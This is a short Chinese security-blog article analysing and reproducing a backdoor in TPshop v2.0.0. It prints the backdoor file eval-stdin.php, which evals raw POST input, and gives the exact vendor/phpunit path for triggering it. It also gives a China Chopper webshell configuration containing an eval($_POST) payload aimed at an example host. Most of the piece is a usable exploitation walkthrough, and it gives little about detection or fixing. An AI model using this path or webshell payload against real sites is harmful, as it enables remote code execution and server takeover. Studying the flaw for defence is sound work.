客服QQ:872490018 服务时间:9:00-21:00

TPshop商城 Getshell后门文件分析与复现

本文作者:i春秋签约作家——Laimooc

官网地址:http://www.tp-shop.cn/

影响版本:TPSHOP v2.0.0

后门文件:eval-stdin.php 内容:

<?php  eval('?>' . file_get_contents('php://input')); ?>

分析:

使用

file_get_contents('php://input'))

接收POST请求的原始数据流

eval函数来执行。

我们把代码复制下来,本地调试如下,惊喜不,喜欢不,兴奋不:

TPshop商城 Getshell后门文件分析与复现-爱尖刀

利用方法:

访问后门文件 url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php,post请求发送数据即可实现getshell。

TPshop商城 Getshell后门文件分析与复现-爱尖刀

那么问题来了,既然可以执行php代码,那么我们就直接配置菜刀连接.

采用写入的话就有点麻烦了。

地址:

http:xss.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

配置:

<O>
<?php eval($_POST[c]);?>
</O>

TPshop商城 Getshell后门文件分析与复现-爱尖刀

TPshop商城 Getshell后门文件分析与复现-爱尖刀


[广告]赞助链接:


舆情监测,互联网舆情首选查舆情:http://www.chayuqing.com/

关注区块链技术落地与应用,碳链:http://www.itanlian.com/

四季很好,只要有你,文娱排行榜:http://www.yaopaiming.com/

让资讯触达的更精准有趣:https://www.0xu.cn/

*文章为作者独立观点,不代表 爱尖刀 立场
本文由 i春秋学院 授权 爱尖刀 发表,并经 爱尖刀 编辑。转载此文章须经作者同意,并请附上出处( 爱尖刀 )及本页链接。原文链接 http://www.ijiandao.com/safe/cto/79649.html
相关文章
基于python爬虫模拟登陆豆瓣#爬虫教程#
基于python爬虫模拟登陆豆瓣#爬虫教程#
Thinkphp远程命令执行漏洞怎么修复?
Thinkphp远程命令执行漏洞怎么修复?
绿光资本清仓苹果股票 苹果股价一度跌超3%
绿光资本清仓苹果股票 苹果股价一度跌超…
修改新版Chrome不显示www完整URL办法
修改新版Chrome不显示www完整URL办法
iOS 第三方解压缩库 0-Day 预警
iOS 第三方解压缩库 0-Day 预警
ThinkPHP order函数SQL注入 – 高危
ThinkPHP order函数SQL注入 – 高危
i春秋学院
ichunqiu 作者
培育信息时代的安全感
  • 文章

    115

  • 评论

    0

关注网络尖刀微信公众号
随时掌握互联网精彩

广告赞助

广告赞助

广告赞助